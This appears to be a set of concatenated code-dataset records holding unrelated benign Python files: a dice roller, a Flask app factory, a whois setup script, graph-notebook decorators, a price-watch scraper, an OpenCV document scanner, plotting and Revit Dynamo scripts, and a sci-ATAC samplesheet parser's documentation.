== 9:\n fmap[\"detail_roll\"] = f\"1D100={j}\"\n fmap[\"detail\"] = Fear[j]\n return f\"{res}{LongInsanity[sym_res].format(**fmap)}\"\n\n\ndef temp_insane():\n sym_res = random.randint(1, 10)\n res = f\"调查员的疯狂发作-临时症状:1D10={sym_res}\\n症状: \\n\"\n fmap = {\"dur\" : f\"1D10={random.randint(1, 10)}\"}\n j = random.randint(1, 100)\n if sym_res == 10:\n fmap[\"detail_roll\"] = f\"1D100={j}\"\n fmap[\"detail\"] = Panic[j]\n elif sym_res == 9:\n fmap[\"detail_roll\"] = f\"1D100={j}\"\n fmap[\"detail\"] = Fear[j]\n return f\"{res}{TempInsanity[sym_res].format(**fmap)}\"\n\ndef dhr(t, o):\n return 100 if t == 0 and o == 0 else t * 10 + o\n\ndef st():\n result = random.randint(1, 20)\n if result < 4:\n rstr = \"右腿\"\n elif result < 7:\n rstr = \"左腿\"\n elif result < 11:\n rstr = \"腹部\"\n elif result < 16:\n rstr = \"胸部\"\n elif result < 18:\n rstr = \"右臂\"\n elif result < 20:\n rstr = \"左臂\"\n else:\n rstr = \"头部\"\n return f\"D20={result}: 命中了{rstr}\"\n\n\ndef en(arg: int) -> str:\n check = random.randint(1, 100)\n if check <= arg and check <= 95:\n return f\"判定值{check},判定失败,技能无成长。\"\n plus = random.randint(1, 10)\n r = f\"判定值1D100={check},判定成功,技能成长{arg}+{plus}={arg + plus}\"\n return r + \"\\n温馨提示:如果技能提高到90%或更高,增加2D6理智点数。\"\n\n\ndef expr(d: diro.Diro, anum: Optional[int], rule: int = 0) -> str:\n d.roll()\n result = d.calc()\n s = f\"{d.expr()}={(d.detail_expr())}={result}\"\n if anum:\n sl = roll_success_level(result, anum, rule)\n s += f\"\\n检定值 {anum}, {SuccessLevel[sl]}\"\n return s\n\n\ndef rd0(pattern: str, anum: Optional[int] = None, rule: int = 0) -> str:\n d_str = pattern.lower().split(\"#\")\n rd = diro.parse(d_str.pop(0))\n time = 1\n if d_str:\n with contextlib.suppress(ValueError):\n time = int(d_str[0])\n r = expr(rd, anum, rule)\n for _ in range(time - 1):\n r += \"\\n\"\n r += expr(rd, anum)\n return r\n","repo_name":"RF-Tar-Railt/RaianBot","sub_path":"library/dice/rd.py","file_name":"rd.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"86"} +{"seq_id":"16071633317","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\nfrom flask_migrate import Migrate\nfrom kakeibosan.config import config\n\n\ndb = SQLAlchemy()\n\n\ndef create_app():\n app = Flask(__name__, static_url_path='/kakeibosan/static')\n app.config.from_object(config)\n db.init_app(app)\n\n login_manager = LoginManager()\n login_manager.init_app(app)\n login_manager.login_view = 'auth.login'\n login_manager.login_message_category = 'info'\n\n with app.app_context():\n from kakeibosan.models import User\n\n @login_manager.user_loader\n def load_user(user_id):\n return User.query.get(user_id)\n\n migrate = Migrate(app, db)\n\n from kakeibosan.views import (\n auth, dashboard, records, settings, settings_account, settings_fixedcost, settings_category,\n )\n\n page_modules = [\n auth.bp,\n dashboard.bp,\n records.bp,\n settings.bp,\n settings_account.bp,\n settings_fixedcost.bp,\n settings_category.bp,\n ]\n\n for bp in page_modules:\n app.register_blueprint(bp, url_prefix='/kakeibosan')\n\n return app\n","repo_name":"showgayaki/kakeibosan","sub_path":"kakeibosan/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"31935139085","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\n\nimport sys, os\n\n__version__ = '0.1'\n\nsetup(name='whois',\n\tversion=__version__,\n\tdescription=\"The Whois client, which is developed in Python language, retrieves domain information from the server.\",\n\tclassifiers=[\n\t\t\"License :: OSI Approved :: MIT License\",\n\t\t\"Operating System :: POSIX\",\n\t\t\"Environment :: Console\",\n\t\t\"Programming Language :: Python\",\n\t\t\"Topic :: Internet\",\n\t\t\"Topic :: Software Development :: Libraries :: Python Modules\",\n\t], \n\tkeywords='whois',\n\tauthor='Larry Kim',\n\tauthor_email='admin@relip.org',\n\turl='http://github.com/relip/python-whois',\n\tlicense='MIT',\n\tpackages=['whois'],\n\tpackage_data={\"whois\": [\"tlds/*\", \"nics/*\"]},\n)\n","repo_name":"relip/python-whois","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"88"} +{"seq_id":"23802913940","text":"import functools\nimport json\nimport re\nimport traceback\n\nfrom IPython.core.display import HTML, display, clear_output\n\nimport ipywidgets as widgets\nfrom graph_notebook.visualization.template_retriever import retrieve_template\nfrom graph_notebook.neptune.client import NEPTUNE_ANALYTICS_SERVICE_NAME\nfrom gremlin_python.driver.protocol import GremlinServerError\nfrom requests import HTTPError\n\nerror_template = retrieve_template(\"error.html\")\n\ncheck_if_access_regex = re.compile(r'^[a-zA-Z0-9_]+((\\[\\'.*?\\'\\])|(\\[\\\".*?\\\"\\])|(\\[.*?\\]))+$')\nvar_name_regex = re.compile(r'^[^\\[]*')\n\n\ndef get_variable_injection_name_and_indices(raw_var: str, keys_are_str: bool = True):\n # get the name of the dict\n var_name = var_name_regex.match(raw_var).group(0)\n # get the rest of the string, containing all the nested keys\n keys_raw = raw_var[len(var_name):len(raw_var)]\n # remove all quotes before we split to keys\n keys_raw = keys_raw.replace('\"', \"\").replace(\"'\", \"\")\n keys_list = keys_raw[1:(len(keys_raw) - 1)].split(\"][\")\n\n if not keys_are_str:\n keys_list = [int(x) for x in keys_raw[1:(len(keys_raw) - 1)].split(\"][\")]\n\n return var_name, keys_list\n\n\ndef get_variable_injection_value(raw_var: str, local_ns: dict):\n # check if var string is trying to access a dict\n if re.match(check_if_access_regex, raw_var):\n var_name, keys_list = get_variable_injection_name_and_indices(raw_var)\n # outer try/except statement in use_magic_variable should catch case where dict_name isn't in local_ns\n current_value = local_ns[var_name]\n # loop through the nested keys/values until we get the final value\n for key in keys_list:\n if isinstance(current_value, dict):\n current_value = current_value[key]\n else: # for list/tuple, try to convert to int first\n try:\n index_key = int(key)\n except ValueError:\n print(\"Error occurred during variable injection: Attempted to access tuple/list with str index. \"\n \"Please check your query.\")\n return\n current_value = current_value[index_key]\n final_value = json.dumps(current_value) if type(current_value) is dict else str(current_value)\n return final_value\n else:\n final_value = local_ns[raw_var]\n if type(final_value) is dict:\n return json.dumps(final_value)\n else:\n return str(final_value)\n\n\ndef display_exceptions(func):\n @functools.wraps(func)\n def do_display_exceptions(*args, **kwargs):\n try:\n show_traceback = kwargs['local_ns']['graph_notebook_show_traceback']\n except KeyError:\n show_traceback = False\n clear_output()\n tab = widgets.Tab()\n\n server_error = False\n try:\n return func(*args, **kwargs)\n except KeyboardInterrupt:\n print('Keyboard interrupt detected.')\n return # we must return since we have halted the kernel interrupt here. Otherwise the interrupt will not work.\n except HTTPError as http_ex:\n caught_ex = http_ex\n raw_html = http_ex_to_html(http_ex)\n server_error = True\n except GremlinServerError as gremlin_ex:\n caught_ex = gremlin_ex\n raw_html = gremlin_server_error_to_html(gremlin_ex)\n server_error = True\n except Exception as e:\n if show_traceback:\n caught_ex = traceback.format_exception(e)\n traceback.print_exception(e)\n else:\n caught_ex = e\n raw_html = exception_to_html(e)\n\n if 'local_ns' in kwargs:\n kwargs['local_ns']['graph_notebook_error'] = caught_ex\n\n if server_error or not show_traceback:\n html = HTML(raw_html)\n html_output = widgets.Output(layout={'overflow': 'scroll'})\n with html_output:\n display(html)\n tab.children = [html_output]\n tab.set_title(0, 'Error')\n display(tab)\n\n return do_display_exceptions\n\n\ndef magic_variables(func):\n @functools.wraps(func)\n def use_magic_variables(*args, **kwargs):\n local_ns = kwargs['local_ns']\n args = list(args)\n variable_regex = re.compile(r'\\$\\{(.*?)}')\n try:\n # If we want to use custom line magic variables with the same syntax:\n # line_string = args[1]\n # args[1] = variable_regex.sub(lambda m: str(local_ns[m.group(1)]), line_string)\n if len(args) > 2:\n cell_string = args[2]\n args[2] = variable_regex.sub(\n lambda m: get_variable_injection_value(raw_var=m.group(1), local_ns=local_ns), cell_string)\n return func(*args, **kwargs)\n except KeyError as key_error:\n print(f'Terminated magic due to undefined variable: {key_error}')\n return\n\n return use_magic_variables\n\n\ndef neptune_db_only(func):\n @functools.wraps(func)\n def check_neptune_db(*args, **kwargs):\n self = args[0]\n if not hasattr(self.graph_notebook_config, 'neptune_service'):\n return func(*args, **kwargs)\n else:\n service_type = self.graph_notebook_config.neptune_service\n if service_type == NEPTUNE_ANALYTICS_SERVICE_NAME:\n print(f'This magic is unavailable for Neptune Analytics.')\n return\n else:\n return func(*args, **kwargs)\n\n return check_neptune_db\n\n\ndef http_ex_to_html(http_ex: HTTPError):\n try:\n error = json.loads(http_ex.response.content.decode('utf-8'))\n content = json.dumps(error, indent=2)\n except Exception:\n content = {\n 'error': http_ex\n }\n error_html = error_template.render(error=content)\n return error_html\n\n\ndef exception_to_html(ex):\n content = {\n 'error': ex\n }\n error_html = error_template.render(error=content)\n return error_html\n\n\ndef gremlin_server_error_to_html(gremlin_ex: GremlinServerError):\n try:\n error = json.loads(gremlin_ex.args[0][5:]) # remove the leading error code.\n content = json.dumps(error, indent=2)\n except Exception:\n content = {\n 'error': gremlin_ex\n }\n error_html = error_template.render(error=content)\n return error_html\n","repo_name":"aws/graph-notebook","sub_path":"src/graph_notebook/decorators/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":6439,"program_lang":"python","lang":"en","doc_type":"code","stars":636,"dataset":"github-code","pt":"88"} +{"seq_id":"23416834303","text":"# https://www.hackerrank.com/challenges/python-string-formatting/problem\n\n__author__ = \"Shovra Das\"\n\n\ndef print_formatted(number):\n w = len('{:b}'.format(number))\n # your code goes here\n for i in range(1, number+1):\n d = '{:d}'.format(i)\n o = '{:o}'.format(i)\n h = '{:X}'.format(i)\n b = '{:b}'.format(i)\n print(d.rjust(w), o.rjust(w), h.rjust(w), b.rjust(w))\n\n \nif __name__ == '__main__':\n n = int(input())\n print_formatted(n)","repo_name":"shovradas/competitive-programming","sub_path":"hackerrank/python/python-string-formatting.py","file_name":"python-string-formatting.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"88"} +{"seq_id":"34191131727","text":"# This short script was inspired by this article on webscraping below\n# https://www.bitcoininsider.org/article/50706/building-web-scraper-start-finish\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport os\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail\n\nurl = 'https://www.bowflex.com/selecttech/552/100131.html'\nresponse = requests.get(url, timeout=5)\ncontent = BeautifulSoup(response.content,\"html.parser\")\n\nhtmlContentFound = content.findAll('button', attrs={\"class\": \"add-to-cart\"})\ncurrentContent = htmlContentFound[0]\ncurrentContent = str(currentContent).replace(\"\\\"\",\"'\")\n\nsoldOutContent = \"\"\n\nif soldOutContent == currentContent:\n message = Mail(\n from_email='',\n to_emails='',\n subject='Weight Prices Update',\n html_content='There has been a change in the price of Weights')\n try:\n sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))\n response = sg.send(message)\n print(response.status_code)\n print(response.body)\n print(response.headers)\n except Exception as e:\n print(e.message)\nelse:\n print('still sold out')\n\n\n","repo_name":"niss3n/webscraper","sub_path":"webscaper.py","file_name":"webscaper.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"6650131693","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 24 16:41:24 2017\n\n@author: applesauce\n\nhttps://www.pyimagesearch.com/2014/09/01/build-kick-ass-mobile-document-scanner-just-5-minutes/\n\"\"\"\n\nimport numpy as np\nimport cv2\n\ndef order_points(pts):\n\trect = np.zeros((4, 2), dtype = \"float32\")\n\ts = pts.sum(axis = 1)\n\trect[0] = pts[np.argmin(s)]\n\trect[2] = pts[np.argmax(s)]\n\tdiff = np.diff(pts, axis = 1)\n\trect[1] = pts[np.argmin(diff)]\n\trect[3] = pts[np.argmax(diff)]\n\treturn rect\n\ndef four_point_transform(image, pts):\n\trect = order_points(pts)\n\t(tl, tr, br, bl) = rect\n\twidthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n\twidthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n\tmaxWidth = max(int(widthA), int(widthB))\n\theightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n\theightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n\tmaxHeight = max(int(heightA), int(heightB))\n\tdst = np.array([\n\t\t[0, 0],\n\t\t[maxWidth - 1, 0],\n\t\t[maxWidth - 1, maxHeight - 1],\n\t\t[0, maxHeight - 1]], dtype = \"float32\")\n\tM = cv2.getPerspectiveTransform(rect, dst)\n\twarped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n\treturn warped\n\ndef translate(image, x, y):\n\tM = np.float32([[1, 0, x], [0, 1, y]])\n\tshifted = cv2.warpAffine(image, M, (image.shape[1], image.shape[0]))\n\treturn shifted\n\ndef rotate(image, angle, center = None, scale = 1.0):\n\t(h, w) = image.shape[:2]\n\tif center is None:\n\t\tcenter = (w / 2, h / 2)\n\tM = cv2.getRotationMatrix2D(center, angle, scale)\n\trotated = cv2.warpAffine(image, M, (w, h))\n\treturn rotated\n\ndef resize(image, width = None, height = None, inter = cv2.INTER_AREA):\n\tdim = None\n\t(h, w) = image.shape[:2]\n\tif width is None and height is None:\n\t\treturn image\n\tif width is None:\n\t\tr = height / float(h)\n\t\tdim = (int(w * r), height)\n\telse:\n\t\tr = width / float(w)\n\t\tdim = (width, int(h * r))\n\tresized = cv2.resize(image, dim, interpolation = inter)\n\treturn resized\n\ndef get_doc(file):\n image = cv2.imread(file)\n ratio = image.shape[0] / 500.0\n orig = image.copy()\n image = resize(image, height = 500)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (5,5), 0)\n retval, thresh = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\n edged = cv2.Canny(thresh, 70, 200)\n (_, cnts, _) = cv2.findContours(edged, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:5]\n for c in cnts:\n \tperi = cv2.arcLength(c, True)\n \tapprox = cv2.approxPolyDP(c, 0.02 * peri, True)\n \tif len(approx) == 4:\n \t\tscreenCnt = approx\n \t\tbreak\n cv2.drawContours(image, [screenCnt], -1, (0, 255, 0), 2)\n warped = four_point_transform(orig, screenCnt.reshape(4, 2) * ratio)\n warped = cv2.cvtColor(warped, cv2.COLOR_BGR2GRAY)\n retval, warped = cv2.threshold(warped, 127, 255, cv2.THRESH_BINARY)\n warped = resize(warped, 1000)\n return warped\n\nif __name__ == '__main__':\n doc = get_doc('images/docscanner/page.jpg')\n cv2.imshow('doc', doc)\n \n\n\n","repo_name":"edeane/learning-opencv-stuff","sub_path":"docscanner.py","file_name":"docscanner.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"27866896065","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport scipy.stats as st\n\nkernels = ['poly', 'rbf', 'linear', 'sigmoid']\nf_svm=[0.47, 0.56, 0.47, 0.47]\na_svm=[.54,.62,.54,.54]\n# nn_data = np.load('results.npz')\n# nn_data2 = np.load('results2.npz')\n# acc = np.concatenate((nn_data['acc'],nn_data2['acc']),axis=0)\n# acc_test = np.concatenate((nn_data['acc_test'],nn_data2['acc_test']),axis=0)\nnn_data3 = np.load('results4.npz')\nf1scores = nn_data3['f1scores']\nacc_test = nn_data3['acc_test']\n# fig, ax = plt.subplots(1,7, sharey=True)\n# fig.suptitle('Neurons per layer, 3 layers')\n# for i in range(7):\n# ax[i].plot(acc[1,i])\n# ax[i].set_title(f'{(i+4)*2}')\n# ax[0].set_ylabel('Accuracy')\n\nplt.figure()\nplt.bar(kernels, f_svm)\nplt.title('Accuracy per kernel')\nplt.xlabel('Kernel')\nplt.ylabel('Accuracy')\n\nfig, ax = plt.subplots(2, 4, sharey=True, sharex=True)\nfig.suptitle('Number of layers vs. number of neurons and accuracy/F1')\nax[0,0].set_ylabel('Accuracy')\nax[1,0].set_ylabel('F1-score')\n\n# f=open('out.csv','a')\n# f.write('Acc_avg,acc_std,f1_avg,f1_se\\n')\nfor i in range(4):\n at_avg=np.average(acc_test, axis=1)\n at_se=st.t.interval(0.95, df=acc_test.shape[1]-1, loc=np.mean(acc_test[i,:]), scale=st.sem(acc_test[i,:]))\n f1_avg=np.average(f1scores, axis=1)\n f1_se=st.t.interval(0.95, df=acc_test.shape[1]-1, loc=np.mean(f1scores[i,:]), scale=st.sem(f1scores[i,:]))\n\n # f.write('{:.4f},{:.4f},{:.4f},{:.4f}\\n'.format(at_avg[i],at_avg[i]-at_se[0],f1_avg[i],f1_avg[i]-f1_se[0]))\n ax[0,i].plot(np.arange(8,22,2),acc_test[i,:])\n ax[0,i].set_title(f'{i+2}')\n ax[1,i].set_xlabel('Neurons per layer')\n ax[1,i].plot(np.arange(8,22,2), f1scores[i,:])\n\n ax[0,i].plot(15,at_avg[i], 'ko')\n ax[0,i].hlines(at_se[0],14,16,'k')\n ax[0,i].hlines(at_se[1],14,16,'k')\n ax[0,i].vlines(15,at_se[0],at_se[1],'k')\n\n ax[1,i].plot(15,f1_avg[i], 'ko')\n ax[1,i].hlines(f1_se[0],14,16,'k')\n ax[1,i].hlines(f1_se[1],14,16,'k')\n ax[1,i].vlines(15,f1_se[0],f1_se[1],'k')\n # red = ax[0,i].hlines(0.51, 8,22, 'r')\n # green = ax[1,i].hlines(0.49, 8,22, 'g')\n# f.close()\n# plt.figlegend([red, green], ['1 sigma accuracy upper bound', '1 sigma F1 upper bound'])\n\nxv, yv = np.meshgrid(np.arange(8,22,2),np.arange(4)+2)\nxvf = xv.flatten()\nyvf = yv.flatten()\nnparams = np.zeros(acc_test.shape[0]*acc_test.shape[1])\nacc_flat = acc_test.flatten()\nnparams = (xvf**2+1) * yvf\n\n# plt.figure()\n# plt.scatter(nparams, acc_flat)\n\n# fig2 = plt.figure()\n# ax = fig2.add_subplot(111, projection='3d')\n# print(xv.shape)\n# print(f1scores.shape)\n# ax.plot_wireframe(xv, yv, f1scores)\n\nplt.show()","repo_name":"qscgy/csds458-final-proj","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"5878023688","text":"# Load the Python Standard and DesignScript Libraries\nimport sys,os,time,tempfile,shutil\nimport clr\nclr.AddReference('ProtoGeometry')\nfrom Autodesk.DesignScript.Geometry import *\nfrom Autodesk.DesignScript.Geometry import Point as pt\nfrom Autodesk.DesignScript.Geometry import Line as ln\nfrom Autodesk.DesignScript.Geometry import Polygon as pg\nfrom Autodesk.DesignScript.Geometry import Curve as cr\nclr.AddReference('RevitAPI')\nfrom Autodesk.Revit.DB import *\nclr.AddReference('RevitAPIUI')\nfrom Autodesk.Revit.UI import TaskDialog\nclr.AddReference(\"RevitNodes\")\nimport Revit\nclr.ImportExtensions(Revit.Elements)\nclr.AddReference(\"RevitServices\")\nimport RevitServices\nfrom RevitServices.Persistence import DocumentManager\nfrom RevitServices.Transactions import TransactionManager\nfrom System.Collections.Generic import *\nclr.ImportExtensions(Revit.GeometryConversion)\nclr.AddReference(\"DSCoreNodes\")\nclr.AddReference('DynamoServices')\nfrom Dynamo.Events import *\n#---------------------------------------------------------------------------------------------#\n#---------------------------------------------------------------------------------------------#\n#---------------------------------------------------------------------------------------------#\n#---------------------------------------------------------------------------------------------#\n\ndef flatten(t):\n return [item for sublist in t for item in sublist]\t\n\ndef getAllElementsOfCategory(doc,cat):\n\t\"\"\"Lấy tất cả các phần tử thuộc Category\n\tcates (list)\n\toc : Revit Document\t\"\"\"\t\n\tcategories = doc.Settings.Categories\t\t\n\tfor c in categories:\n\t\tif c.Name == cat:\t\t\t\t\t\n\t\t\treturn list(FilteredElementCollector(doc).OfCategoryId(c.Id).WhereElementIsNotElementType().ToElements())\n\n\ndef browse_element(doc,cat,param = None):\n\t\"\"\"\t\"\"\"\t\n\tdebugger = []\n\texceptions = []\n\tcategories = doc.Settings.Categories\t\t\n\tfor c in categories:\n\t\ttry:\n\t\t\tif c.Name == cat:\t\t\t\t\t\n\t\t\t\telements = list(FilteredElementCollector(doc).OfCategoryId(c.Id).WhereElementIsNotElementType().ToElements())\n\t\t\t\tfor e in elements:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tparam_winumber = e.LookupParameter(param)\n\t\t\t\t\t\twi_number = param_winumber.AsString()\n\t\t\t\t\t\tif wi_number.strip() != \"\":\n\t\t\t\t\t\t\tdebugger.append(wi_number)\n\n\t\t\t\t\texcept Exception as ex:\n\t\t\t\t\t\texceptions.append(ex)\n\t\t\t\t\t\tpass\n\t\texcept Exception as ex:\n\t\t\texceptions.append(ex)\n\t\t\tpass\n\treturn debugger#, exceptions\n\ndef get_dyn_path():\n\treturn ExecutionEvents.ActiveSession.CurrentWorkspacePath\ndef get_revit_dir():\n\treturn os.getcwd()\n\ndef get_temp_dir():\n\ttempDir = tempfile.gettempdir()\n\treturn tempDir\n\ndef get_temp_file_path(fileName):\n\ttempDir = tempfile.gettempdir()\n\ttempFP = tempDir + fileName\n\treturn tempFP\n# def run_cmd(cmd_command):\n# \"\"\"example: py C:\\\\Users\\\\tvpduy\\\\py_logistic\\\\monitor_master.py\"\"\"\n# cmd_call = f\"start /B start cmd.exe @cmd /k {cmd_command}...\"\n# os.system(cmd_call)\n#---------------------------------------------------------------------------------------------#\n#---------------------------------------------------------------------------------------------#\n#---------------------------------------------------------------------------------------------#\n#---------------------------------------------------------------------------------------------#\ndoc = DocumentManager.Instance.CurrentDBDocument\nuiapp = DocumentManager.Instance.CurrentUIApplication\napp = uiapp.Application\n\ncates = IN[0].splitlines()\nparam_work_item_number = IN[1]\nschedule_txt_path = IN[2]\n\n\n# elements = flatten([getAllElementsOfCategory(doc,cat) for cat in cates])\n\nwith open(schedule_txt_path,'r') as f:\n\tOUT = f.readlines()\n# OUT = get_revit_dir(), get_dyn_path() # flatten([browse_element(doc,cat,param_work_item_number) for cat in cates])\n","repo_name":"JoeyTran87/py_dynamo_revit","sub_path":"py_dynamo/date_by_workitemnumber.py","file_name":"date_by_workitemnumber.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"88"} +{"seq_id":"4046095890","text":"#!/usr/bin/env python3\n\n#\n# Notes:\n# o the master file is bbi-sciatac-demux/samplesheet/sciatac_samplesheet.py\n\n\"\"\"\nProgram: sciatac_samplesheet.py\nSummary:\n This program reads a (front-end) CSV spreadsheet file, performs a variety of\n checks, 'fixes' sample names, and writes a 'back-end' samplesheet file for\n use with the processing pipeline. There are two back-end samplesheet formats:\n Andrew Hill's sci-ATAC pipeline samplesheet format and a JSON format file\n required by the BBI sci-ATAC pipeline.\n\nInput (front-end) samplesheet format:\n o the input samplesheet file is a CSV format spreadsheet file (use a\n spreadsheet program to create the CSV file)\n o checks rows\n o checks the first eight cells in each row and trims off additional cells\n o ignores rows with all empty cells\n o reports an error if there are both empty and non-empty cells amongst\n the first six (the last two cells in a non-header row may be empty)\n o the first row is a header with the following required columns\n o n5 barcode identifier with possible values: 'n5_wells' or 'n5_indexes'\n o n7 barcode identifier with possible values: 'n7_wells' or 'n7_indexes'\n o p5 barcode identifier with possible values: 'p5_wells' or 'p5_indexes'\n or 'p5_columns'. If the p5 identifier is p5_columns, then the p7\n identifier must be p7_rows.\n o p7 barcode identifier with possible values: 'p7_wells' or 'p7_indexes'\n or 'p7_rows'. If the p7 identifier is p7_rows, then the p5\n identifier must be p5_columns.\n o sample name identifier with value: 'sample_name'\n o genome label identifier with value: 'genome'\n o peak_group (called peaks are merged by peak group)\n o peak_file (a bed file of peaks; will be merged with called peaks if the\n peak_group value has non-zero length)\n and the following optional column\n o wrap_group the name of the group to which the results will\n be distributed. This information is used by the bbi-sciatac-wrap\n script. Valid names consist of lower and upper case alphabetic\n characters, numerals, and the symbols '.', '_', and '-'. Cells may\n be empty in which case those samples are excluded from the wrap.\n o the column order is arbitrary (but must be consistent within the file)\n o the header values do not depend on case\n o ranges: index, well, column, and row range values are separated by either\n '-' or ':', your choice (mixes are allowed)\n examples:\n o 3-5\n o 3:5\n o 3-5,7:12\n o multiple barcode values: multiple indexes, wells, columns, and rows (and\n ranges) are separated by ','\n examples:\n o indexes: 1-5,7,89-96\n o wells: P1-A10,P1-A11\n o rows: E,F,G\n o columns: 3,7,12\n o sample names:\n o begin with an alphabetic character: a-z and A-Z\n o allowed characters are alphabetic (a-z and A-Z), numeric (0-9), and\n period '.'\n o this program converts other characters in the sample name to '.',\n and then checks for sample name degeneracy. If there is, the program\n exits immediately.\n o genomes:\n o recognized genome names are listed in the variable 'genome_name_list'\n in this program's code. If a samplesheet genome name is not in the\n list, sciatac_samplesheet.py gives a warning in case the name is\n mis-spelled.\n o genome is the name of the organism that was sequenced. This\n identifies the files required to analyze the reads. The genome string\n is passed to the processing pipeline, and the pipeline uses it to\n find required files. Available genomes are defined by the 'name'\n field in the bbi-sciatac-analyze/genomes.json file.\n o peak groups\n o the called peaks of samples with the same peak group name are merged\n prior to downstream analysis\n o a sample peak group string (cell) may be empty\n o peak group names consist of alphabetic, positive integers, and\n underscore characters\n o each sample must have a peak_group or a peak_file or both\n o if both a peak group and peak file are specified, the peaks in\n the peak bed file are merged with the called peaks in the group\n during the pipeline run\n o peak files\n o an absolute path to a peak bed file (it must begin with '/')\n o a sample peak file string (cell) is empty when no peak\n file is wanted for the sample\n o each sample must have a peak_group or a peak_file or both\n o if both a peak group and peak file are specified, the peaks in\n the peak bed file are merged with the called peaks in the group\n during the pipeline run\n o wells:\n o samplesheet wells are converted to indexes where indexes refer to\n physical wells, which are in the order used in Andrew's pipeline;\n that is, N7 and P7 indexes increase by column number along each row\n and N5 and P5 indexes increase by row letter down each column\n o wells that include a plate identifier can have either '-' or ':'\n separating the plate and well, your choice (mixes within a range are\n allowed)\n examples:\n o P1-A10\n o P1:A10\n o wells are given as single or ranges of wells separated by commas.\n examples:\n o A01-A12,B01:B12\n o P1:A01-P1:A12,P2-A01:P2-A12\n o when the same set of wells is used from all four plates for a sample,\n use 'P*' for the plate number\n example:\n o P*:A01-P*:A04 is the same as P1:A01-P1:A04,P2:A01-P2:A04,P3:A01-P3:A04,P4:A01-P4:A04\n o wells names do not depend on case\n examples:\n o P1-A10\n o p1-a10\n o indexes:\n o indexes are given as single or ranges of integer well indexes\n separated by commas.\n example:\n o 3,5-8,89:96\n o indexes refer to physical wells in the order used in Andrew's\n pipeline and range from 1 to 384. Indexes 1 to 96 refer to\n plate 1, 97 to 192 to plate 2, and so on, for P5, P7, N5, and\n N7.\n o p7 rows:\n o u-titer plate rows used for PCR reactions\n o rows are given as single or ranges of rows separated by commas\n examples:\n o E,F,G\n o D-F,H\n o p5 columns:\n o u-titer plate columns used for PCR reactions\n o columns are given as single or ranges of columns separated\n by commas\n examples:\n o 3,4,5\n o 3-5,10-12\n o p7 rows and p5 columns:\n o by default, the i-th p7 row is paired with the i-th p5 column.\n No other combinations of specified rows and columns are considered.\n Consequently, the order of the rows and columns must be correct.\n Technical notes:\n o for each sample, the ATAC-seq pipeline takes all combinations\n of the P7 and P5 indices specified for the sample. Consequently,\n if the P7 rows were given as A-B and the P5 columns were given\n as 1-2 in the input CSV file, and this program passed the\n corresponding indices directly to the pipeline, the pipeline\n would accept PCR index pairs for row/column pairs A/1, A/2,\n B/1, and B/2.\n o in order to restrict the PCR index combinations to one P7 row\n and one P5 column, this program expands the number of spreadsheet\n rows per sample by the number of P7 rows given for the sample in\n the input CSV file. For example, if for sample 'sample_1' the\n p7_rows specification is 'A-B' and the p5_columns is '6,5', this\n program generates (internally) two rows for 'sample_1', the\n first with PCR row column pair A/6 and the second with PCR\n row/column pair B/5.\n o p7 wells and p5 wells\n o this program converts wells to indices and passes the indices to\n the pipeline. The pipeline uses combinations of all p7 and p5\n wells. The order of the wells is unimportant.\n o name the barnyard sample 'Barnyard' for compatibility with the\n experiment dashboard\n\n Example samplesheet file:\n\n N7_indexes,N5_wells,P7_rows,P5_columns,sample_name,genome,peak_group,peak_file,wrap_group\n 1:96,P1-A01:P1-H01,\"E,F,G\",\"1,2,3\",sample.1,mouse,group_1,,Smith\n 1:96,P1-A02:P1-H02,\"E,F,G\",\"1,2,3\",sample.2,human,group_2,,Jones\n 1:96,P1-A03:P1-H03,\"E,F,G\",\"1,2,3\",sample.3,mouse,group_1,,Smith\n 1:96,P1-A04:P1-H04,\"E,F,G\",\"1,2,3\",sample.4,human,group_2,,/home/me/my_peaks.bed,Jones\n 1:96,P1-A05:P1-H05,\"E,F,G\",\"1,2,3\",sample.5,human,group_2,,Jones\n 1:96,P1-A06:P1-H06,\"E,F,G\",\"1,2,3\",sample.6,mouse,group_1,,Smith\n 